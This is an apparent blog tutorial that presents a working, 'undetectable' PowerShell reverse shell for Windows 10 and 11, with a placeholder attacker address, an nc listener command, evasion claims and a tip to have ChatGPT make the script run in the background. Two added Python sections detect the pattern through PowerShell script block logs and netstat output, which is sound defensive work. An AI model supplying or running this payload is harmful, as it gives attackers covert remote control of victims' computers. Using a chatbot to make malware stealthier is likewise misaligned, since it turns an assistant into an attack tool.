Undetectable reverse shell windows 11
Today, I'll share an undetectable reverse shell for Windows 10 and Windows 11.
"Remember, this article is for research and educational purposes only, and I cannot be held responsible for any actions taken based on this information."
What is a Reverse Shell?
A reverse shell is a clever method where the connection is initiated from the target machine, not the attacker's system. This enables attackers to establish an interactive shell session on the victim's computer, even bypassing obstacles like firewalls or network address translation.
Undetectable Reverse Shell
In our demonstration, we'll use a reverse shell that remains invisible to antivirus software. Once the connection is established, it goes undetected, making it difficult for anyone, including the victim, to notice any unusual activity (unless there's a network sniffer present, which is unlikely for regular users).
Payload
$ErrorActionPreference = "Stop"

function Connect-RemoteShell {
    param (
        [string]$RemoteAddress,
        [int]$RemotePort
    )
    try {
        $tcpClient = New-Object Net.Sockets.TCPClient
        $result = $tcpClient.BeginConnect($RemoteAddress, $RemotePort, $null, $null)
        $wait = $result.AsyncWaitHandle.WaitOne(5000, $false)
        if (!$wait -or !$tcpClient.Connected) {
            throw "Failed to establish a connection."
        }
        $stream = $tcpClient.GetStream()
        $writer = New-Object IO.StreamWriter($stream)
        $reader = New-Object IO.StreamReader($stream)
        while ($true) {
            $commandPrompt = $reader.ReadLine()
            if ($commandPrompt -eq $null) { break }
            $output = Invoke-Expression $commandPrompt 2>&1 | Out-String
            $writer.WriteLine($output + "`nSHELL> ")
            $writer.Flush()
        }
    }
    catch {
        Write-Host "Failed to establish a connection: $_"
    }
    finally {
        if ($reader) { $reader.Close() }
        if ($writer) { $writer.Close() }
        if ($tcpClient) { $tcpClient.Close() }
    }
}

Connect-RemoteShell -RemoteAddress "YOURIP" -RemotePort 2222
Replace "YOURIP" with the IP address of the attacker's machine and 2222 with the designated listening port.
Explanation of the Payload
The payload is a PowerShell script that establishes a reverse shell connection. Here's a breakdown of its structure and functionality:
- The variable $ErrorActionPreference is set to "Stop", which ensures that any error encountered during execution is raised as a terminating exception.
- The function Connect-RemoteShell is defined with two parameters: $RemoteAddress for the IP address of the remote machine, and $RemotePort for the port number.
- Inside the function, a TCP client is created using New-Object to establish a connection to the remote machine.
- The BeginConnect method is called on the TCP client object to initiate the connection to the specified IP address and port. It is an asynchronous operation, and the script waits on it with a timeout of 5 seconds.
- If the connection is not successfully established (if $wait is false or the TCP client is not connected), an exception is thrown indicating the failure.
- If the connection is established, a network stream is obtained from the TCP client, and an IO writer and reader are created on it to handle the communication.
- The code enters a loop that continuously reads one line of input from the remote machine's stream. If the input is null, the loop breaks.
- The Invoke-Expression cmdlet executes that line as PowerShell code. The resulting output (including errors, via 2>&1) is captured and converted to a string using Out-String.
- The output is written back to the remote machine's stream along with a "SHELL>" prompt to indicate that it is ready for the next command.
- The loop continues, allowing for an interactive shell session where commands can be executed remotely.
- If any exception occurs during the execution of the function, an error message is displayed.
- The finally block ensures that the IO reader, writer, and TCP client are properly closed regardless of any exceptions.
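The same breakdown also tells a defender what to look for. Antivirus may not flag the script file, but when PowerShell script block logging is enabled, Windows records the text of every executed script block (Event ID 4104), so the combination the payload depends on (a raw TCP channel, a read loop, and Invoke-Expression on whatever was read) is visible in the log. The scanner below is an added example and not part of the original post; the log records it processes are constructed inline, and the indicator names and the three-group rule are my own choices, not a published detection.

```python
"""Added example (not from the original post): scan the ScriptBlockText of
PowerShell 4104-style log records for the reverse-shell pattern explained above.
A record is flagged only when all three building blocks are present:
a network channel, a way to execute received text, and a read loop."""
import re
from dataclasses import dataclass, field

# Indicator groups, matched case-insensitively because PowerShell is case-insensitive.
NETWORK = {
    "tcpclient": re.compile(r"Net\.Sockets\.TcpClient", re.I),
    "getstream": re.compile(r"\.GetStream\(\)", re.I),
    "streamreader": re.compile(r"IO\.StreamReader", re.I),
}
EXECUTE = {
    "invoke-expression": re.compile(r"\bInvoke-Expression\b", re.I),
    "iex-alias": re.compile(r"\biex\b", re.I),
    "scriptblock-create": re.compile(r"\[ScriptBlock\]::Create", re.I),
}
LOOP = {
    "while-true": re.compile(r"while\s*\(\s*\$true\s*\)", re.I),
    "readline": re.compile(r"\.ReadLine\(\)", re.I),
}
GROUPS = (NETWORK, EXECUTE, LOOP)


@dataclass
class Finding:
    record_id: int
    verdict: str                      # "reverse-shell-pattern" or "benign"
    matched: list = field(default_factory=list)


def classify_script_block(record_id, text):
    """Classify one script block; the verdict needs a hit in every indicator group."""
    matched = [name for group in GROUPS for name, rx in group.items() if rx.search(text)]
    has_all = all(any(rx.search(text) for rx in group.values()) for group in GROUPS)
    return Finding(record_id, "reverse-shell-pattern" if has_all else "benign", matched)


def scan_script_blocks(records):
    """Return only the flagged findings, in record order."""
    return [f for f in (classify_script_block(i, t) for i, t in records)
            if f.verdict == "reverse-shell-pattern"]


# Constructed sample records (record id, ScriptBlockText); not real log data.
SAMPLE_RECORDS = [
    (101, "Get-ChildItem -Path C:\\Logs -Filter *.evtx | Sort-Object LastWriteTime"),
    # A legitimate port check: opens a socket but executes nothing it receives.
    (102, "$c = New-Object Net.Sockets.TcpClient('intranet.example', 8080); "
          "if ($c.Connected) { 'port open' }; $c.Close()"),
    # The core of the post's payload, as it would appear in a 4104 record.
    (103, "$tcpClient = New-Object Net.Sockets.TCPClient; "
          "$stream = $tcpClient.GetStream(); $reader = New-Object IO.StreamReader($stream); "
          "while ($true) { $cmd = $reader.ReadLine(); if ($cmd -eq $null) { break }; "
          "$out = Invoke-Expression $cmd 2>&1 | Out-String }"),
    (104, "$data = (Invoke-WebRequest https://updates.example/manifest.json).Content; "
          "$m = $data | ConvertFrom-Json"),
]

if __name__ == "__main__":
    for f in scan_script_blocks(SAMPLE_RECORDS):
        print(f"record {f.record_id}: {f.verdict} ({', '.join(f.matched)})")
```

Requiring a hit in all three groups is what keeps record 102 quiet: a TcpClient on its own is ordinary administrative code, and Invoke-Expression on its own is common in installers. A real pipeline would feed this function from the Microsoft-Windows-PowerShell/Operational channel rather than from an inline list, and would add the obfuscation cases (string concatenation, Base64 via -EncodedCommand) that this plain regex pass does not cover.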
Start a listener on the attacker's machine on the designated port:
    nc -vnlp 2222
With port 2222 being actively listened on, we can proceed to execute the payload on the target machine.
ChatGPT can assist with modifying the script so that it runs in the background or in a specific context.
After running the payload, we receive our reverse shell connection. With this implementation, we have successfully created a reverse shell that remains undetectable by antivirus software and is highly unlikely to be discovered by casual users. I hope you found this article insightful and gained valuable knowledge from it. If you have any questions or need further clarification, please feel free to leave a comment, and I'll be sure to respond promptly.
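The earlier claim that only a network sniffer would notice this session, and the listener setup just described, share one consequence: once the payload connects, the victim holds an ESTABLISHED outbound TCP session owned by powershell.exe to an arbitrary port, which is visible to netstat on the host without any packet capture. The triage script below is an added example, not part of the original post or its tooling. It parses a constructed netstat -ano style table and a constructed PID-to-process map (standing in for a tasklist or Get-Process lookup); the script-host list and the allowlist of expected ports are my assumptions and should be tuned per environment.

```python
"""Added example (not from the original post): flag established outbound TCP
sessions owned by a scripting host, which is what a connected reverse shell of
the kind shown above looks like from the victim's own connection table."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Interactive script hosts that should rarely hold long-lived outbound sessions (assumption).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe", "mshta.exe"}
# Remote ports a script host plausibly uses for web or WinRM traffic (assumption).
EXPECTED_PORTS = {80, 443, 5985, 5986}
RFC1918 = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


@dataclass
class Suspect:
    pid: int
    process: str
    local: str
    remote: str
    reason: str


def parse_netstat_line(line):
    """Parse one 'netstat -ano' TCP row into (local, remote, state, pid); None otherwise."""
    parts = line.split()
    if len(parts) != 5 or parts[0] != "TCP":
        return None            # header, UDP rows (4 columns) and blank lines are skipped
    return parts[1], parts[2], parts[3], int(parts[4])


def split_endpoint(endpoint):
    """'203.0.113.10:2222' -> ('203.0.113.10', 2222); IPv6 rows look like [addr]:port."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def is_rfc1918(ip_text):
    """True for private IPv4 space; IPv6 addresses never match these networks."""
    addr = ip_address(ip_text)
    return any(addr in net for net in RFC1918)


def find_suspect_connections(netstat_output, process_by_pid):
    """Return script-host sessions to ports outside the allowlist, in table order."""
    suspects = []
    for line in netstat_output.splitlines():
        row = parse_netstat_line(line.strip())
        if row is None:
            continue
        local, remote, state, pid = row
        if state != "ESTABLISHED":
            continue
        proc = process_by_pid.get(pid, "?").lower()
        if proc not in SCRIPT_HOSTS:
            continue
        rip, rport = split_endpoint(remote)
        if rport in EXPECTED_PORTS:
            continue
        scope = "internal" if is_rfc1918(rip) else "external"
        suspects.append(Suspect(pid, proc, local, remote,
                                f"script host with established session to {scope} host on port {rport}"))
    return suspects


# Constructed sample table; 203.0.113.0/24 is a documentation range, not a real peer.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.0.5:49712         52.96.10.1:443         ESTABLISHED     1332
  TCP    10.0.0.5:51234         203.0.113.10:2222      ESTABLISHED     4120
  TCP    10.0.0.5:5985          10.0.0.9:60122         ESTABLISHED     4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       924
  TCP    10.0.0.5:51240         10.0.0.20:443          ESTABLISHED     4128
  UDP    0.0.0.0:5353           *:*                                    2208
"""
# Constructed PID-to-image map, as tasklist or Get-Process would report it.
SAMPLE_PROCESSES = {1332: "chrome.exe", 4120: "powershell.exe", 4: "System",
                    924: "svchost.exe", 4128: "pwsh.exe"}

if __name__ == "__main__":
    for s in find_suspect_connections(SAMPLE_NETSTAT, SAMPLE_PROCESSES):
        print(f"PID {s.pid} {s.process} {s.local} -> {s.remote}: {s.reason}")
```

The pwsh.exe session to an internal host on 443 passes because it matches the allowlist, while the powershell.exe session to port 2222 is reported. On a live host the same check can be run in one line with Get-NetTCPConnection -State Established joined to Get-Process on OwningProcess; the Python version is here so the rule can be tested against saved netstat output from an incident.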